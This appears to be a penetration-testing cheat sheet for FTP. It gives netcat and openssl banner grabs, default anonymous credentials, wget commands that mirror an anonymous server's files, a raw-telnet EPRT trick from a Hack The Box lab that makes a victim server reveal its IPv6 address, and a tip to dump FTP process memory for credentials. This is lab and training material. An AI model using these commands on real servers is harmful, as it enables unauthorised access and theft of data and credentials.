21 - FTP

nc -vn <IP> 21
openssl s_client -connect somesite.com:21 -starttls ftp

Anonymous Login

anonymous : anonymous
anonymous :
ftp : ftp

Download All Files

wget -m ftp://anonymous:anonymous@10.10.10.98
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98

Force IPv6 Callback

RFC2428 inform about the function EPRT which can be used to connect to another host. The following are sample EPRT commands: 

 EPRT |1|132.235.1.2|6275|
 EPRT |2|1080::8:800:200C:417A|5282|

EPRT can be used this to send a connection from a victim FTP server back to our attacking devices, in order to disclose the victims IPv6 address. EPRT isn't a valid "normal" FTP command, it is a RAW FTP command, so instead of using FTP you need to use telnet port 21.

$ telnet zetta.htb 21
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
USER 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
331 User 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 OK. Password required
PASS 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
EPRT |2|dead:beef:2::1008|4488|        // my IPv6 address
200-FXP transfer: from 10.10.14.10 to dead:beef:2::1008%160
200 PORT command successful
LIST
425 Could not open data connection to port 4488: Connection refused

Capture incoming IPv6 address with tcpdump.

Victim IPv6 address: dead:beef::250:56ff:feb9:df29

Dumping Memory

Attach to FTP process and dump it's memory, in hope of finding credentials.

Interesting Files

Last updated

Was this helpful?